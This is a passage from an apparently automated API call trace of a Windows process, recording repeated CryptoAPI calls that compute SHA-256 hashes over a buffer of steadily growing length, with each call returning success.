(hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0x800, dwFlags=0x0) returned 1 [0151.179] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.179] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64280 [0151.179] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e64280, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64280, pdwDataLen=0xce51c) returned 1 [0151.179] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.179] CryptReleaseContext (hProv=0x338231d0, dwFlags=0x0) returned 1 [0151.179] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.180] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.180] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x820, dwFlags=0x0) returned 1 [0151.180] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.180] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e646d0 [0151.180] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e646d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e646d0, pdwDataLen=0xce51c) returned 1 [0151.180] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.180] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.180] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.181] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.181] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x840, dwFlags=0x0) returned 1 [0151.181] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.181] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64040 [0151.181] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64040, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64040, pdwDataLen=0xce51c) returned 1 [0151.181] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.181] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.181] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338223d0) returned 1 [0151.181] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.181] CryptHashData (hHash=0x332b7900, pbData=0x32e5fa80, dwDataLen=0x860, dwFlags=0x0) returned 1 [0151.181] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.181] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63b30 [0151.181] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e63b30, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63b30, pdwDataLen=0xce51c) returned 1 [0151.181] CryptDestroyHash (hHash=0x332b7900) returned 1 [0151.181] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0151.181] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.182] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.182] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x880, dwFlags=0x0) returned 1 [0151.182] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.182] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63ce0 [0151.182] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e63ce0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63ce0, pdwDataLen=0xce51c) returned 1 [0151.182] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.182] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.182] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.183] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.183] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0151.183] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.183] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e640d0 [0151.183] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e640d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e640d0, pdwDataLen=0xce51c) returned 1 [0151.183] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.183] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.183] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.183] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.183] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0151.184] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64130 [0151.184] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64130, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64130, pdwDataLen=0xce51c) returned 1 [0151.184] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.184] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.184] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822bd0) returned 1 [0151.184] CryptCreateHash (in: hProv=0x33822bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.184] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0151.184] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.184] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63b60 [0151.184] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63b60, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63b60, pdwDataLen=0xce51c) returned 1 [0151.184] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.184] CryptReleaseContext (hProv=0x33822bd0, dwFlags=0x0) returned 1 [0151.184] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.185] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.185] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x900, dwFlags=0x0) returned 1 [0151.185] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.185] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64250 [0151.185] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64250, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64250, pdwDataLen=0xce51c) returned 1 [0151.185] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.185] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0151.185] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338239d0) returned 1 [0151.186] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.186] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x920, dwFlags=0x0) returned 1 [0151.186] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.186] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e642b0 [0151.186] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e642b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e642b0, pdwDataLen=0xce51c) returned 1 [0151.187] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.187] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0151.187] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338232d0) returned 1 [0151.187] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.187] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x940, dwFlags=0x0) returned 1 [0151.187] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.187] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63bf0 [0151.187] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63bf0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63bf0, pdwDataLen=0xce51c) returned 1 [0151.187] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.187] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0151.187] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33822cd0) returned 1 [0151.188] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.188] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x960, dwFlags=0x0) returned 1 [0151.188] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.188] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64340 [0151.188] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64340, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64340, pdwDataLen=0xce51c) returned 1 [0151.188] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.188] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0151.188] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.189] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.189] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x980, dwFlags=0x0) returned 1 [0151.189] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64370 [0151.189] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64370, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64370, pdwDataLen=0xce51c) returned 1 [0151.189] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.189] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.189] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.189] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.189] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0151.189] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.189] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e643a0 [0151.189] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e643a0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e643a0, pdwDataLen=0xce51c) returned 1 [0151.189] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.189] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.189] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821dd0) returned 1 [0151.190] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.190] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0151.190] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.190] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63c20 [0151.190] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e63c20, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63c20, pdwDataLen=0xce51c) returned 1 [0151.190] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.190] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0151.190] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338222d0) returned 1 [0151.191] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.191] CryptHashData (hHash=0x332b7970, pbData=0x32e5fa80, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0151.191] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e643d0 [0151.191] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e643d0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e643d0, pdwDataLen=0xce51c) returned 1 [0151.191] CryptDestroyHash (hHash=0x332b7970) returned 1 [0151.191] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0151.191] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338229d0) returned 1 [0151.191] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.191] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0151.191] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.191] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64400 [0151.191] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64400, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64400, pdwDataLen=0xce51c) returned 1 [0151.191] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.191] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0151.191] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.192] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.192] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xa20, dwFlags=0x0) returned 1 [0151.192] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63dd0 [0151.192] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e63dd0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63dd0, pdwDataLen=0xce51c) returned 1 [0151.192] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.192] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.192] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338234d0) returned 1 [0151.193] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.193] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xa40, dwFlags=0x0) returned 1 [0151.193] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e644c0 [0151.193] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e644c0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e644c0, pdwDataLen=0xce51c) returned 1 [0151.193] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.193] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0151.193] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338230d0) returned 1 [0151.193] CryptCreateHash (in: hProv=0x338230d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.193] CryptHashData (hHash=0x332b7a50, pbData=0x32e5fa80, dwDataLen=0xa60, dwFlags=0x0) returned 1 [0151.193] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.193] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63c50 [0151.193] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e63c50, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63c50, pdwDataLen=0xce51c) returned 1 [0151.193] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0151.194] CryptReleaseContext (hProv=0x338230d0, dwFlags=0x0) returned 1 [0151.194] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.194] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.194] CryptHashData (hHash=0x332b7dd0, pbData=0x32e5fa80, dwDataLen=0xa80, dwFlags=0x0) returned 1 [0151.194] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.194] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64430 [0151.194] CryptGetHashParam (in: hHash=0x332b7dd0, dwParam=0x2, pbData=0x32e64430, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64430, pdwDataLen=0xce51c) returned 1 [0151.194] CryptDestroyHash (hHash=0x332b7dd0) returned 1 [0151.194] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.194] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338235d0) returned 1 [0151.195] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.195] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xaa0, dwFlags=0x0) returned 1 [0151.195] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.195] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64460 [0151.195] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64460, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64460, pdwDataLen=0xce51c) returned 1 [0151.195] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.195] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0151.195] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338221d0) returned 1 [0151.196] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.196] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xac0, dwFlags=0x0) returned 1 [0151.196] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e644f0 [0151.196] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e644f0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e644f0, pdwDataLen=0xce51c) returned 1 [0151.196] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.196] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0151.196] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x33821fd0) returned 1 [0151.196] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.196] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xae0, dwFlags=0x0) returned 1 [0151.196] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.196] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e645b0 [0151.196] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e645b0, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e645b0, pdwDataLen=0xce51c) returned 1 [0151.196] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.196] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0151.197] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338236d0) returned 1 [0151.197] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.197] CryptHashData (hHash=0x332b77b0, pbData=0x32e5fa80, dwDataLen=0xb00, dwFlags=0x0) returned 1 [0151.197] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.197] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e63c80 [0151.197] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e63c80, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e63c80, pdwDataLen=0xce51c) returned 1 [0151.197] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0151.197] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0151.197] CryptAcquireContextW (in: phProv=0xce530, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce530*=0x338225d0) returned 1 [0151.198] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce520 | out: phHash=0xce520) returned 1 [0151.198] CryptHashData (hHash=0x332b75f0, pbData=0x32e5fa80, dwDataLen=0xb20, dwFlags=0x0) returned 1 [0151.198] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x4, pbData=0xce51c, pdwDataLen=0xce52c, dwFlags=0x0 | out: pbData=0xce51c, pdwDataLen=0xce52c) returned 1 [0151.198] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e64520 [0151.198] CryptGetHashParam (in: hHash=0x332b75f0, dwParam=0x2, pbData=0x32e64520, pdwDataLen=0xce51c, dwFlags=0x0 | out: pbData=0x32e64520, pdwDataLen=0xce51c) returned 1 [0151.198] CryptDestroyHash (hHash=0x332b75f0) returned 1 [0151.198] CryptReleaseContext 